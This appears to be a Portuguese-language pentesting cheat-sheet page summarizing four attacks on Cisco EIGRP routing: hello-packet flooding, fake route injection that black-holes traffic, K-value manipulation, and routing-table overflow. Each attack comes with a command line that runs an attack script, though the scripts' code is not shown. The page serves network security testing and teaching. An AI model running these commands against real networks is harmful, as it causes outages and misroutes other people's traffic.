EIGRP Attacks
Last updated
Last updated
Aprenda e pratique Hacking AWS:Treinamento HackTricks AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: Treinamento HackTricks GCP Red Team Expert (GRTE)
Este é um resumo dos ataques expostos em https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Verifique para mais informações.
Objetivo: Sobrecarregar as CPUs dos roteadores inundando-os com pacotes hello EIGRP, potencialmente levando a um ataque de Negação de Serviço (DoS).
Ferramenta: Script helloflooding.py.
Execução: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parâmetros:
--interface
: Especifica a interface de rede, por exemplo, eth0
.
--as
: Define o número do sistema autônomo EIGRP, por exemplo, 1
.
--subnet
: Define a localização da sub-rede, por exemplo, 10.10.100.0/24
.
Objetivo: Disruptir o fluxo de tráfego de rede injetando uma rota falsa, levando a um buraco negro onde o tráfego é direcionado para um destino inexistente.
Ferramenta: Script routeinject.py.
Execução: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parâmetros:
--interface
: Especifica a interface do sistema do atacante.
--as
: Define o número AS EIGRP.
--src
: Define o endereço IP do atacante.
--dst
: Define o IP da sub-rede de destino.
--prefix
: Define a máscara do IP da sub-rede de destino.
Objetivo: Criar interrupções contínuas e reconexões dentro do domínio EIGRP injetando valores K alterados, resultando efetivamente em um ataque de DoS.
Ferramenta: Script relationshipnightmare.py.
Execução: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parâmetros:
--interface
: Especifica a interface de rede.
--as
: Define o número AS EIGRP.
--src
: Define o endereço IP de um roteador legítimo.
Objetivo: Sobrecarregar a CPU e a RAM do roteador inundando a tabela de roteamento com numerosas rotas falsas.
Ferramenta: Script routingtableoverflow.py.
Execução: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parâmetros:
--interface
: Especifica a interface de rede.
--as
: Define o número AS EIGRP.
--src
: Define o endereço IP do atacante.
Aprenda e pratique Hacking AWS:Treinamento HackTricks AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: Treinamento HackTricks GCP Red Team Expert (GRTE)